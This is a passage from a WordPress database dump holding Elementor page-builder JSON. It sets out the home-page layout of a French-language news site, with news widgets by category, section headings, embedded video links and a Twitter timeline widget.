n_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2301,746,'_elementor_version','0.4'),(2302,746,'_elementor_css','a:3:{s:4:\"time\";i:1509369368;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2304,747,'_elementor_edit_mode','builder'),(2305,747,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_wei